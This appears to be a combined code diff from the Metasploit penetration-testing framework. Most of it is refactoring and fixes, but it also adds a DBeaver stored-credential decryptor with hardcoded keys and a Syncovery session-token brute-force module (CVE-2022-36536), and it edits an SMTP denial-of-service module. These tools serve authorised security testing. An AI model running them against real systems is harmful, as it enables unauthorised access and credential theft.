+          hash.select { |entry| entry[:tag] == name }.map { |entry| entry[:value] }
+        end
+
+        # Take an array of results from an mcp query, and change them from
+        # an array of tag=>value into a hash.
+        #
+        # Note! If there are multiple fields with the same tag, this will
+        # only return one of them!
+        def mcp_to_h(array)
+          array.map do |r|
+            [r[:tag], r[:value]]
+          end.to_h
+        end
+
+        # Build an mcp message
+        #
+        # Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-builder.rb
+        def mcp_build(tag, type, data)
+          if @tags_by_name[tag].nil?
+            raise "Invalid mcp tag: #{tag}"
+          end
+          if @tags_by_name[type].nil?
+            raise "Invalid mcp type: #{type}"
+          end
+
+          out = ''
+          if type == 'structure'
+            out = [data.join.length, data.join].pack('Na*')
+          elsif type == 'string'
+            out = [data.length + 2, data.length, data].pack('Nna*')
+          elsif type == 'uquad'
+            out = [data].pack('Q>')
+          elsif type == 'ulong'
+            out = [data].pack('N')
+          elsif type == 'uword'
+            out = [data].pack('n')
+          elsif type == 'long'
+            out = [data].pack('N')
+          elsif type == 'tag'
+            out = [@tags_by_name[data]].pack('n')
+          elsif type == 'byte'
+            out = [data].pack('C')
+          elsif type == 'mac'
+            out = [data].pack('a6')
+          else
+            raise "Unknown type: #{type}"
+          end
+
+          out = [@tags_by_name[tag], @tags_by_name[type], out].pack('nna*')
+
+          return out
+        end
+
+        # Do a query_all request for something that will reply with a single
+        # query result.
+        #
+        # Attempts to abstract away all the messiness in the protocol, instead
+        # we just query for a type and get all the responses as an array of
+        # hashes
+        def mcp_simple_query(querytype)
+          # Get the raw result
+          result = mcp_send_recv([
+            mcp_build('query_all', 'structure', [
+              mcp_build(querytype, 'structure', [])
+            ])
+          ])
+
+          # Error handling
+          unless result
+            print_error('mcp_send_recv failed')
+            return nil
+          end
+
+          # Sanity check - we only expect one result
+          if result.length != 1
+            print_error("mcp_send_recv query was supposed to return one result, but returned #{result.length} results instead")
+            return nil
+          end
+          # Get that result
+          result = result.pop
+
+          # Get the reply
+          result = mcp_get_single(result, 'query_reply')
+          if result.nil?
+            print_error("mcp didn't return a query_reply to our query")
+            return nil
+          end
+
+          # Get all the fields for the querytype
+          result = mcp_get_multiple(result, querytype)
+
+          # Convert each result to a hash
+          result = result.map do |single_result|
+            mcp_to_h(single_result)
+          end
+
+          result
+        end
+      end
+    end
+  end
+end
@@ -40,6 +40,11 @@ module FileInfo
      nil
    )['return']

+    if file_version_info_size == 0
+      # Indicates an error - should not continue
+      return nil
+    end
+
    buffer = session.railgun.kernel32.VirtualAlloc(
      nil,
      file_version_info_size,
@@ -151,6 +151,8 @@ module Msf
              results << datastore.merge(overrides)
            end
          end
+        rescue ::Interrupt
+          raise
        rescue StandardError => e
          results << Msf::RhostsWalker::Error.new(value, cause: e)
        end
@@ -17,7 +17,7 @@ module Msf::WebServices
  #                            Needed when using self-signed SSL certificates.
  # MSF_WS_DATA_SERVICE_SKIP_VERIFY - (Boolean) Skip validating authenticity of server's certificate.
  # MSF_WS_DATA_SERVICE_LOGGER - (String) The logger that framework will use. By default logs will be
-  #                             placed in ``~/.msf4/logs`
+  #                             placed in `~/.msf4/logs`
  module FrameworkExtension
    FALSE_VALUES = [nil, false, 0, '0', 'f', 'false', 'off', 'no'].to_set

@@ -452,7 +452,12 @@ class Creds

      unless tbl.nil?
        public_val = core.public ? core.public.username : ''
-        private_val = core.private ? core.private.to_s : ''
+        if core.private
+          # Show the human readable description by default, unless the user ran with `--verbose` and wants to see the cred data
+          private_val = truncate ? core.private.to_s : core.private.data
+        else
+          private_val = ''
+        end
        if truncate && private_val.to_s.length > 87
          private_val = "#{private_val[0,87]} (TRUNCATED)"
        end
@@ -16,7 +16,8 @@ class Db

  include Msf::Ui::Console::CommandDispatcher
  include Msf::Ui::Console::CommandDispatcher::Common
-  include Msf::Ui::Console::CommandDispatcher::Analyze
+  include Msf::Ui::Console::CommandDispatcher::Db::Common
+  include Msf::Ui::Console::CommandDispatcher::Db::Analyze

  DB_CONFIG_PATH = 'framework/database'

@@ -86,21 +87,6 @@ class Db
    end
  end

-  #
-  # Returns true if the db is connected, prints an error and returns
-  # false if not.
-  #
-  # All commands that require an active database should call this before
-  # doing anything.
-  #
-  def active?
-    if not framework.db.active
-      print_error("Database not connected")
-      return false
-    end
-    true
-  end
-
  @@workspace_opts = Rex::Parser::Arguments.new(
    [ '-h', '--help' ] => [ false, 'Help banner.'],
    [ '-a', '--add' ] => [ true, 'Add a workspace.', '<name>'],
@@ -507,6 +493,7 @@ class Db
        onlyup = true
      when '-o'
        output = val
+        output = ::File.expand_path(output)
      when '-R', '--rhosts'
        set_rhosts = true
      when '-S', '--search'
@@ -694,6 +681,8 @@ class Db
      return @@services_columns
    when '-O', '--order'
      return []
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
    when '-p', '--port'
      return []
    when '-r', '--protocol'
@@ -923,6 +912,10 @@ class Db
    if words.length == 1
      return @@vulns_opts.option_keys.select { |opt| opt.start_with?(str) }
    end
+    case words[-1]
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
+    end
  end

  def cmd_vulns_help
@@ -1097,6 +1090,8 @@ class Db
    case words[-1]
    when '-O', '--order'
      return []
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
    end

    []
@@ -1166,6 +1161,7 @@ class Db
        search_term = val
      when '-o', '--output'
        output_file = val
+        output_file = ::File.expand_path(output_file)
      when '-O'
        if (order_by = val.to_i - 1) < 0
          print_error('Please specify a column number starting from 1')
@@ -2131,48 +2127,6 @@ class Db
    true
  end

-
-  #
-  # Miscellaneous option helpers
-  #
-
-  #
-  # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into
-  # blocks of 1024.
-  #
-  def each_host_range_chunk(host_ranges, &block)
-    # Chunk it up and do the query in batches. The naive implementation
-    # uses so much memory for a /8 that it's basically unusable (1.6
-    # billion IP addresses take a rather long time to allocate).
-    # Chunking has roughly the same performance for small batches, so
-    # don't worry about it too much.
-    host_ranges.each do |range|
-      if range.nil? or range.length.nil?
-        chunk = nil
-        end_of_range = true
-      else
-        chunk = []
-        end_of_range = false
-        # Set up this chunk of hosts to search for
-        while chunk.length < 1024 and chunk.length < range.length
-          n = range.next_ip
-          if n.nil?
-            end_of_range = true
-            break
-          end
-          chunk << n
-        end
-      end
-
-      # The block will do some
-      yield chunk
-
-      # Restart the loop with the same RangeWalker if we didn't get
-      # to the end of it in this chunk.
-      redo unless end_of_range
-    end
-  end
-
  #######
  private

@@ -1,4 +1,4 @@
-module Msf::Ui::Console::CommandDispatcher::Analyze
+module Msf::Ui::Console::CommandDispatcher::Db::Analyze

  def cmd_analyze_help
    print_line "Usage: analyze [OPTIONS] [addr1 addr2 ...]"
@@ -0,0 +1,60 @@
+# -*- coding: binary -*-
+
+module Msf::Ui::Console::CommandDispatcher::Db::Common
+
+  #
+  # Returns true if the db is connected, prints an error and returns
+  # false if not.
+  #
+  # All commands that require an active database should call this before
+  # doing anything.
+  #
+  def active?
+    unless framework.db.active
+      print_error("Database not connected")
+      return false
+    end
+    true
+  end
+
+  #
+  # Miscellaneous option helpers
+  #
+
+  #
+  # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into
+  # blocks of 1024.
+  #
+  def each_host_range_chunk(host_ranges, &block)
+    # Chunk it up and do the query in batches. The naive implementation
+    # uses so much memory for a /8 that it's basically unusable (1.6
+    # billion IP addresses take a rather long time to allocate).
+    # Chunking has roughly the same performance for small batches, so
+    # don't worry about it too much.
+    host_ranges.each do |range|
+      if range.nil? or range.length.nil?
+        chunk = nil
+        end_of_range = true
+      else
+        chunk = []
+        end_of_range = false
+        # Set up this chunk of hosts to search for
+        while chunk.length < 1024 and chunk.length < range.length
+          n = range.next_ip
+          if n.nil?
+            end_of_range = true
+            break
+          end
+          chunk << n
+        end
+      end
+
+      # The block will do some
+      yield chunk
+
+      # Restart the loop with the same RangeWalker if we didn't get
+      # to the end of it in this chunk.
+      redo unless end_of_range
+    end
+  end
+end
@@ -75,7 +75,6 @@ class MsfAutoload
      "#{__dir__}/msf/core/payload/linux/x64",
      "#{__dir__}/msf/core/web_services/servlet",
      "#{__dir__}/msf/base",
-      "#{__dir__}/msf/ui/console/command_dispatcher/db",
      "#{__dir__}/rex/parser/fs"
    ]
  end
@@ -0,0 +1,140 @@
+module Rex
+  module Parser
+    # @author Kali-Team
+    module Dbeaver
+
+      module Error
+        class DbeaverError < StandardError
+        end
+
+        class ParserError < DbeaverError
+        end
+
+        class DecryptionError < ParserError
+        end
+      end
+
+      SECRET_KEY = 'sdf@!#$verf^wv%6Fwe%$$#FFGwfsdefwfe135s$^H)dg'.freeze
+      AES_KEY = "\xBA\xBBJ\x9FwJ\xB8S\xC9l-e=\xFETJ".freeze
+      # decrypt_dbeaver_credentials
+      #
+      # @param credentials_config_data [String]
+      # @return [String] plaintext
+      def decrypt_dbeaver_credentials(credentials_config_data)
+        aes = OpenSSL::Cipher.new('AES-128-CBC')
+        begin
+          aes.decrypt
+          aes.key = AES_KEY
+          plaintext = aes.update(credentials_config_data)
+          plaintext << aes.final
+        rescue OpenSSL::Cipher::CipherError => e
+          raise Error::DecryptionError, 'Unable to decrypt dbeaver credentials'
+        end
+        return plaintext[plaintext.index('{"')..]
+      end
+
+      # parse_credentials
+      #
+      # @param credentials_config_data [String]
+      # @return [Hash] result_hashmap
+      def parse_credentials(credentials_config_data)
+        decrypt_data = decrypt_dbeaver_credentials(credentials_config_data)
+        result_hashmap = Hash.new
+        begin
+          result_hashmap = JSON.parse(decrypt_data)
+        rescue ::JSON::ParserError => e
+          raise Error::ParserError, "[parse_credentials] #{e.class} - #{e}"
+        end
+        return result_hashmap
+      end
+
+      # parse_data_sources
+      #
+      # @param data_sources_data [String]
+      # @param credentials_config_data [String]
+      # @return [Hash] result_hashmap
+      def parse_data_sources(data_sources_data, credentials_config_data)
+        credentials = parse_credentials(credentials_config_data)
+        result_hashmap = Hash.new
+        if credentials.empty?
+          return result_hashmap
+        end
+
+        begin
+          data_sources = JSON.parse(data_sources_data)
+          connections = data_sources['connections']
+          if connections.nil? || connections.empty?
+            return result_hashmap
+          end
+
+          connections.each do |data_source_id, item|
+            next if item['configuration'].nil?
+
+            result_hashmap[data_source_id] = Hash[
+              'name' => item['name'] || '',
+              'provider' => item['provider'] || '',
+              'host' => item['configuration']['host'] || '',
+              'port' => item['configuration']['port'] || '',
+              'user' => credentials.key?(data_source_id) ? credentials[data_source_id]['#connection']['user'] : '',
+              'password' => credentials.key?(data_source_id) ? credentials[data_source_id]['#connection']['password'] : '',
+              'database' => item['configuration']['database'] || '',
+              'url' => item['configuration']['url'] || '',
+              'type' => item['configuration']['type'] || ''
+          ]
+          end
+        rescue ::JSON::ParserError => e
+          raise Error::ParserError, "[parse_data_sources] #{e.class} - #{e}"
+        end
+        return result_hashmap
+      end
+
+      # decrypt_dbeaver_6_1_3
+      #
+      # @param base64_string [String]
+      # @return [String]
+      def decrypt_dbeaver_6_1_3(base64_string)
+        plaintext = ''
+        if base64_string.nil?
+          return plaintext
+        end
+
+        data = Rex::Text.decode_base64(base64_string)
+        for i in 0..data.length - 3
+          xor_data = Rex::Text.xor(data[i], SECRET_KEY[i % SECRET_KEY.length])
+          plaintext += xor_data
+        end
+        return plaintext
+      end
+
+      # parse_data_sources_xml
+      #
+      # @param data_sources_data [String]
+      # @return [Hash] result_hashmap
+      def parse_data_sources_xml(data_sources_data)
+        mxml = REXML::Document.new(data_sources_data).root
+        unless mxml
+          raise Error::ParserError, '[parse_data_sources_xml] XML parsing error'
+        end
+        result_hashmap = Hash.new
+        mxml.elements.to_a('//data-sources//data-source//connection//').each do |node|
+          next unless node.name == 'connection'
+
+          data_source_id = node.parent.attributes['id']
+          result_hashmap[data_source_id] = Hash[
+            'name' => node.parent.attributes['name'] || '',
+            'provider' => node.parent.attributes['provider'] || '',
+            'host' => node.attributes['host'] || '',
+            'port' => node.attributes['port'] || '',
+            'user' => node.attributes['user'] || '',
+            'password' => decrypt_dbeaver_6_1_3(node.attributes['password']),
+            'database' => node.attributes['database'] || '',
+            'url' => node.attributes['url'] || '',
+            'type' => node.attributes['type'] || ''
+        ]
+        end
+        return result_hashmap
+      end
+
+    end
+  end
+end
@@ -290,17 +290,16 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
  # If a block is given, it will be called before each file is uploaded and
  # again when each upload is complete.
  #
-  def File.upload(destination, *src_files, &stat)
+  def File.upload(dest, *src_files, &stat)
    src_files.each { |src|
-      dest = destination
-
-      stat.call('uploading', src, dest) if (stat)
-      if (self.basename(destination) != ::File.basename(src))
-        dest += self.separator + ::File.basename(src)
+      if (self.basename(dest) != ::File.basename(src))
+        dest += self.separator unless dest.end_with?(self.separator)
+        dest += ::File.basename(src)
      end
+      stat.call('Uploading', src, dest) if (stat)

      upload_file(dest, src)
-      stat.call('uploaded', src, dest) if (stat)
+      stat.call('Completed', src, dest) if (stat)
    }
  end

@@ -310,7 +309,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
  def File.upload_file(dest_file, src_file, &stat)
    # Open the file on the remote side for writing and read
    # all of the contents of the local file
-    stat.call('uploading', src_file, dest_file) if stat
+    stat.call('Uploading', src_file, dest_file) if stat
    dest_fd = nil
    src_fd = nil
    buf_size = 8 * 1024 * 1024
@@ -330,7 +329,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      src_fd.close unless src_fd.nil?
      dest_fd.close unless dest_fd.nil?
    end
-    stat.call('uploaded', src_file, dest_file) if stat
+    stat.call('Completed', src_file, dest_file) if stat
  end

  def File.is_glob?(name)
@@ -352,7 +351,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      if (::File.basename(dest) != File.basename(src))
        # The destination when downloading is a local file so use this
        # system's separator
-        dest += ::File::SEPARATOR + File.basename(src)
+        dest += ::File::SEPARATOR unless dest.end_with?(::File::SEPARATOR)
+        dest += File.basename(src)
      end

      # XXX: dest can be the same object as src, so we use += instead of <<
@@ -386,7 +386,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      dst_stat = ::File.stat(dest_file)
      if src_stat.size == dst_stat.size && src_stat.mtime == dst_stat.mtime
        src_fd.close
-        return 'skipped'
+        return 'Skipped'
      end
    end

@@ -429,7 +429,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
              seek_back = false
              stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
            else
-              # succesfully read and wrote - reset the counter
+              # successfully read and wrote - reset the counter
              tries_cnt = 0
            end
            adjust_block = true
@@ -477,7 +477,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO

    # Clone the times from the remote file
    ::File.utime(src_stat.atime, src_stat.mtime, dest_file)
-    return 'download'
+    return 'Completed'
  end

  #
@@ -338,7 +338,7 @@ class Console::CommandDispatcher::Stdapi::Fs
    true
  end

-  # 
+  #
  # Tab completion for the lcat command
  #
  def cmd_lcat_tabs(str, words)
@@ -1053,7 +1053,7 @@ class Console::CommandDispatcher::Stdapi::Fs
    src_items << last if src_items.empty?

    if args.size == 1
-      dest = last.split(/(\/|\\)/).last
+      dest = client.fs.file.basename(last)
    else
      dest = last
    end
@@ -234,7 +234,7 @@ class Client

    send_request(req, t)

-    res = read_response(t)
+    res = read_response(t, :original_request => req)
    if req.respond_to?(:opts) && req.opts['ntlm_transform_response'] && self.ntlm_client
      req.opts['ntlm_transform_response'].call(self.ntlm_client, res)
    end
@@ -568,6 +568,12 @@ class Client
    resp = Response.new
    resp.max_data = config['read_max_data']

+    original_request = opts.fetch(:original_request) { nil }
+    parse_opts = {}
+    unless original_request.nil?
+      parse_opts = { :orig_method => original_request.opts['method'] }
+    end
+
    Timeout.timeout((t < 0) ? nil : t) do

      rv = nil
@@ -580,7 +586,7 @@ class Client
        begin

          buff = conn.get_once(resp.max_data, 1)
-          rv   = resp.parse(buff || '')
+          rv   = resp.parse(buff || '', parse_opts)

        # Handle unexpected disconnects
        rescue ::Errno::EPIPE, ::EOFError, ::IOError
@@ -629,7 +635,7 @@ class Client
        body = resp.body
        resp = Response.new
        resp.max_data = config['read_max_data']
-        rv = resp.parse(body)
+        rv = resp.parse(body, parse_opts)
      # We found a 100 Continue but didn't read the real reply yet
      # Otherwise reread the reply, but don't try this hack again
      else
@@ -71,7 +71,10 @@ class Packet
  # Parses the supplied buffer.  Returns one of the two parser processing
  # codes (Completed, Partial, or Error).
  #
-  def parse(buf)
+  # @param [String] buf The buffer to parse; possibly not a complete request/response
+  # @param [Hash] opts Parsing options
+  # @option [Boolean] orig_method The HTTP method used in an associated request, if applicable
+  def parse(buf, opts={})

    # Append the incoming buffer to the buffer queue.
    self.bufq += buf.to_s
@@ -80,13 +83,15 @@ class Packet

      # Process the header
      if(self.state == ParseState::ProcessingHeader)
-        parse_header
+        parse_header(opts)
      end

      # Continue on to the body if the header was processed
      if(self.state == ParseState::ProcessingBody)
-        # Chunked encoding sets the parsing state on its own
-        if (self.body_bytes_left == 0 and not self.transfer_chunked)
+        # Chunked encoding sets the parsing state on its own.
+        # HEAD requests can return immediately.
+        orig_method = opts.fetch(:orig_method) { '' }
+        if (self.body_bytes_left == 0 && (!self.transfer_chunked || orig_method == 'HEAD'))
          self.state = ParseState::Completed
        else
          parse_body
@@ -280,24 +285,27 @@ protected

  ##
  #
-  # Parsing
+  # Parse the HTTP header returned by the target server.
  #
+  # @param [Hash] opts Parsing options
+  # @option [Boolean] orig_method The HTTP method used in an associated request, if applicable
  ##
-
-  def parse_header
+  def parse_header(opts)

    head,data = self.bufq.split(/\r?\n\r?\n/, 2)

-    return if not data
+    return if data.nil?

    self.headers.from_s(head)
    self.bufq = data || ""

    # Set the content-length to -1 as a placeholder (read until EOF)
    self.body_bytes_left = -1
+    orig_method = opts.fetch(:orig_method) { '' }
+    self.body_bytes_left = 0 if orig_method == 'HEAD'

-    # Extract the content length if it was specified
-    if (self.headers['Content-Length'])
+    # Extract the content length if it was specified (ignoring it for HEAD requests, per RFC9110)
+    if (self.headers['Content-Length'] && orig_method != 'HEAD')
      self.body_bytes_left = self.headers['Content-Length'].to_i
    end

@@ -5,7 +5,14 @@ require 'rex/socket'
 # TODO: write a real LDAP client in Rex and migrate all consumers
 class Net::LDAP::Connection # :nodoc:
  module SynchronousRead
-    def read(length = nil, opts = {})
+    # Read `length` bytes of data from the LDAP connection socket and
+    # return this data as a string.
+    #
+    # @param length [Integer] Length of the data to be read from the LDAP connection socket.
+    # @param _opts [Hash] Unused
+    #
+    # @return [String] A string containing the data read from the LDAP connection socket.
+    def read(length = nil, _opts = {})
      data = ''
      loop do
        chunk = super(length - data.length)
@@ -21,6 +28,14 @@ class Net::LDAP::Connection # :nodoc:
    end
  end

+  # Initialize the LDAP connection using Rex::Socket::TCP,
+  # and optionally set up encryption on the connection if configured.
+  #
+  # @param server [Hash] Hash of the options needed to set
+  #   up the Rex::Socket::TCP socket for the LDAP connection.
+  # @see http://gemdocs.org/gems/rex-socket/0.1.43/Rex/Socket.html#create-class_method
+  # @see http://gemdocs.org/gems/rex-socket/0.1.43/Rex/Socket.html#create_param-class_method
+  # @see http://gemdocs.org/gems/rex-socket/0.1.43/Rex/Socket/Parameters.html#from_hash-class_method
  def initialize(server)
    begin
      @conn = Rex::Socket::Tcp.create(
@@ -55,9 +70,8 @@ class Net::LDAP::Connection # :nodoc:
  # @see https://github.com/ruby-ldap/ruby-net-ldap/pull/411
  #
  # @param [Hash] args A hash of the arguments to be utilized by the search operation.
-  #
-  # @return [Net::LDAP::PDU] A Protocol Data Unit (PDU) object, represented by the Net::LDAP::PDU class, containing the results of the search operation.
-  #
+  # @return [Net::LDAP::PDU] A Protocol Data Unit (PDU) object, represented by
+  #   the Net::LDAP::PDU class, containing the results of the search operation.
  def search(args = nil)
    args ||= {}

@@ -9,20 +9,20 @@ module Rex::UserAgent
  # Taken from https://www.whatismybrowser.com/guides/the-latest-user-agent/
  #
  COMMON_AGENTS = [
-      # Chrome
-      'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36',
-      'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36',
+    # Chrome
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',

-      # Edge
-      'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+    # Edge
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.46',

-      # Safari
-      'Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1',
-      'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15',
+    # Safari
+    'Mozilla/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15',

-      # Firefox
-      'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0',
-      'Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0',
+    # Firefox
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0'
  ]

  #
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.101'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.105'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.20'
  # Needed by msfgui and other rpc components
@@ -205,8 +205,6 @@ Gem::Specification.new do |spec|
  spec.add_runtime_dependency 'xdr'
  # Needed for ::Msf...CertProvider
  spec.add_runtime_dependency 'faker'
-  # Pinned as a dependency of i18n to the last working version
-  spec.add_runtime_dependency 'concurrent-ruby','1.0.5'
  # SSH server library with ed25519
  spec.add_runtime_dependency 'hrr_rb_ssh-ed25519'
  # Needed for irb internal command
@@ -38,10 +38,10 @@ class MetasploitModule < Msf::Auxiliary

      sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28

-      smtp_send_recv("EHLO X\r\n")
-      smtp_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
+      raw_send_recv("EHLO X\r\n")
+      raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
      print_status("Sending DoS packet.")
-      smtp_send_recv("RCPT TO: #{sploit}\r\n")
+      raw_send_recv("RCPT TO: #{sploit}\r\n")

      disconnect
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
    xml = Nokogiri::XML.parse(response.body)

    legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content
-    fail_with(Failure::NotFound, 'No \'LegacyDN\' was found') if legacy_dn.empty?
+    fail_with(Failure::NotFound, 'No \'LegacyDN\' was found') if legacy_dn.blank?

    server = ''
    owa_urls = []
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'base64'
+require 'date'
+require 'json'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/syncovery_file_sync_backup'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery For Linux Web-GUI Session Token Brute-Forcer',
+        'Description' => %q{
+          This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time
+          of the login instead of a random token.
+          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.
+        },
+        'Author' => [ 'Jan Rude' ],
+        'References' => [
+          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
+          ['CVE', '2022-36536']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'DisclosureDate' => '2022-09-06',
+        'DefaultOptions' => {
+          'RPORT' => 8999,
+          'STOP_ON_SUCCESS' => true # One valid session is enough
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptInt.new('DAYS', [true, 'Check today and last X day(s) for valid session token', 1]),
+        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
+      ]
+    )
+
+    deregister_options(
+      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
+      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
+      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'PASSWORD_SPRAY', 'BLANK_PASSWORDS',
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['isSyncoveryWindows'] == 'false'
+        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+        if version.empty?
+          vprint_warning("#{peer} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
+          vprint_good("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Appears
+        else
+          vprint_status("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run_host(ip)
+    # Calculate dates
+    days = datastore['DAYS']
+    if days < 0
+      days = 0
+    end
+    dates = []
+    (0..days).each do |day|
+      dates << (Date.today - day).strftime('%m/%d/%Y')
+    end
+    time = DateTime.now.strftime('%H:%M:%S')
+    hrs, min, sec = time.split(':')
+
+    # Create possible session tokens
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new
+    dates.each do |date|
+      (0..hrs.to_i).reverse_each do |hours|
+        (0..min.to_i).reverse_each do |minutes|
+          (0..sec.to_i).reverse_each do |seconds|
+            timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
+            cred_collection.add_private(Base64.strict_encode64(timestamp).strip)
+          end
+          sec = 59
+        end
+        min = 59
+      end
+      hrs = 23
+    end
+
+    print_status("#{peer.strip} - Starting Brute-Forcer")
+    scanner = Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      if result.success?
+        print_good("#{peer.strip} - VALID TOKEN: #{result.credential.private}")
+      else
+        vprint_error("#{peer.strip} - INVALID TOKEN: #{result.credential.private}")
+      end
+    end
+  end
+end
@@ -255,12 +255,14 @@ class MetasploitModule < Msf::Auxiliary
            sz = file.end_of_file
          end

+          # Logging of the obtained data.
+          logdata << "#{ip}\\#{share_name}#{subdirs.first}\\#{fname.encode}\n"
+          detailed_tbl << [ip.to_s, fa || 'Unknown', share_name, subdirs.first + '\\', fname, tcr, tac, twr, tch, sz]
+
          # Filename is too long for the UI table, cut it.
          fname = "#{fname[0, 35]}..." if fname.length > 35

          pretty_tbl << [fa || 'Unknown', fname, tcr, tac, twr, tch, sz]
-          detailed_tbl << [ip.to_s, fa || 'Unknown', share_name, subdirs.first + '\\', fname, tcr, tac, twr, tch, sz]
-          logdata << "#{ip}\\#{share_name}#{subdirs.first}\\#{fname.encode}\n"
        end
